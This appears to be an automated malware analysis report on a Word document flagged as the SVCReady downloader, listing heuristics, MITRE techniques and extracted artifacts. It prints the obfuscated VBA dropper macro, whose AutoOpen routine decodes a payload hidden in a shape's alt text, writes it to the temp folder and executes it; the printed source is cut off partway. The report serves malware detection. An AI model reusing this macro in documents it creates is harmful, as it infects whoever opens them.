MALICIOUS
210
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is an OOXML document containing a VBA macro with an AutoOpen subroutine. This macro utilizes WScript.Shell to execute a command that writes a file to the temporary directory, named '1.jpg'. The macro also uses the Environ("tmp") function to construct this path, indicating a downloader or dropper functionality.
Heuristics 7
-
ClamAV: Doc.Downloader.SVCReady-8f5af0a5f0da7070-9951542-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.SVCReady-8f5af0a5f0da7070-9951542-0
-
External relationship high OOXML_EXTERNAL_RELExternal target in word/_rels/document.xml.rels: file:///C:\Framework\rels\builds\pack1\us.jpg
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas OOXML external relationship
- http://schemas.microsoft.com/office/drawing/2014/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexOOXML external relationship
- http://schemas.openxmlformats.org/markup-compatibility/2006OOXML external relationship
- http://schemas.microsoft.com/office/drawing/2016/inkOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2017/model3dOOXML external relationship
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsOOXML external relationship
- http://schemas.openxmlformats.org/officeDocument/2006/mathOOXML external relationship
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingOOXML external relationship
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingOOXML external relationship
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainOOXML external relationship
- http://schemas.microsoft.com/office/word/2010/wordmlOOXML external relationship
- http://schemas.microsoft.com/office/word/2012/wordmlOOXML external relationship
- http://schemas.microsoft.com/office/word/2018/wordml/cexOOXML external relationship
- http://schemas.microsoft.com/office/word/2016/wordml/cidOOXML external relationship
- http://schemas.microsoft.com/office/word/2018/wordmlOOXML external relationship
- http://schemas.microsoft.com/office/word/2015/wordml/symexOOXML external relationship
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupOOXML external relationship
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkOOXML external relationship
- http://schemas.microsoft.com/office/word/2006/wordmlOOXML external relationship
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeOOXML external relationship
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 4589 bytes |
SHA-256: e34d6396a4e2c52ee5c8430baf2df2c39c5e77abd1dd40fd2ab06a5d3766b140 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "e3cf765a"
Function e762f5ff()
e762f5ff = ActiveWindow.DisplayHorizontalScrollBar
End Function
Function a472736e()
a472736e = ActiveWindow.Index
End Function
Function b0a1860b()
b0a1860b = Application.ActiveDocument.AutoFormatOverride
End Function
Function a44eb9dc()
a44eb9dc = ActiveWindow.Creator
End Function
Sub AutoOpen()
Dim aa0c2b54 As New b810b071
aaa = ce61079c(d2bdffc8)
b5c62664 = aa0c2b54.eb53dc44(aaa, "")
c4172424 d5871320, b5c62664
Dim c974cd15 As New WshShell
Call c974cd15.exec(b7581dc7 & " " & d5871320)
End Sub
Attribute VB_Name = "ab30b94e"
Function b46f43ab()
b46f43ab = ActiveWindow.Document
End Function
Function fc40b8d8()
fc40b8d8 = 38067.608593889
End Function
Function e9d24fd3() As Long
Dim e4dcd90e As Long
Dim c9fd3abe As Integer
c9fd3abe = 200
For e4dcd90e = 5 To 90
c9fd3abe = c9fd3abe + e4dcd90e
Next e4dcd90e
e9d24fd3 = c9fd3abe
End Function
Function af855354()
af855354 = ActiveWindow.Visible
End Function
Sub c4172424(f3ffd76b, d66f7af9)
Dim fc935e6d
fc935e6d = FreeFile
Open f3ffd76b For Output As #fc935e6d
Print #fc935e6d, f24bc2fe(d66f7af9)
Close #fc935e6d
End Sub
Function d5871320()
d5871320 = Environ("tmp") & "\1.jpg"
End Function
Function c76290f0()
c76290f0 = Application.ActiveDocument.ActiveWindow
End Function
Function d0b30402()
d0b30402 = ActiveWindow.Top
End Function
Function f8bab22d()
f8bab22d = ActiveWindow.Type
End Function
Function ca9ef670()
ca9ef670 = Application.ActiveDocument.ActiveThemeDisplayName
End Function
Function ce61079c(b641a5ed)
For cf2f796b = 1 To Len(b641a5ed) Step 3
d304679e = d304679e & Mid(b641a5ed, cf2f796b, 1)
Next
ce61079c = d304679e
End Function
Function b4f024a4()
b4f024a4 = ActiveWindow.View
End Function
Function f8b4ba2f()
f8b4ba2f = ActiveWindow.Type
End Function
Function d6a66692()
d6a66692 = 789 + 9
End Function
Function ba6970b0()
ba6970b0 = ActiveWindow.DisplayRulers
End Function
Sub c64e87f2()
End Sub
Function b9523905()
b9523905 = Application.ActiveDocument.AttachedTemplate
End Function
Function b0c4a757()
b0c4a757 = "a7GoRvt"
End Function
Function dd28431d()
dd28431d = ActiveWindow.DisplayHorizontalScrollBar
End Function
Function ccd3e109()
ccd3e109 = 23329.673349652
End Function
Function f24bc2fe(d66f7af9)
f24bc2fe = StrConv(d66f7af9, 64)
End Function
Function db21c8ff()
db21c8ff = 43942.286781848
End Function
Function afc04f43()
afc04f43 = ActiveWindow.WindowNumber
End Function
Function c2d74106()
c2d74106 = ActiveWindow.DisplayVerticalRuler
End Function
Function c0d002bd()
c0d002bd = ActiveWindow.Index
End Function
Function d2bdffc8()
d2bdffc8 = ActiveDocument.Shapes(1).AlternativeText
End Function
Function f6f3992b()
f6f3992b = ActiveWindow.Creator
End Function
Function dac798f5()
dac798f5 = "agwdlKM"
End Function
Function d4a71a51()
d4a71a51 = ActiveWindow.SplitVertical
End Function
Function b75036b8()
b75036b8 = Application.ActiveDocument.Application
End Function
Function b7581dc7()
b7581dc7 = ce61079c("r05e40gd5sf2v69raa35e2dd")
End Function
Attribute VB_Name = "b810b071"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function edc81dd2()
edc81dd2 = ActiveWindow.Document
End Function
Function fa4a63de()
fa4a63de = ActiveWindow.Thumbnails
End Function
Function e954666d()
e954666d = "Born scoot mealies ah howlings"
End Function
Function a39278f6()
a39278f6 = Application.ActiveDocument.ActiveThemeDisplayName
End Function
Function eb53dc44(dbcc0205, d87e9329)
Dim b3427090 As Object
Set b
... (truncated)
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 28672 bytes |
SHA-256: 6af6fbf1f5e134a7a6fbc1229e3b9214548dd912a7123df6305e3c8dfcab9868 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.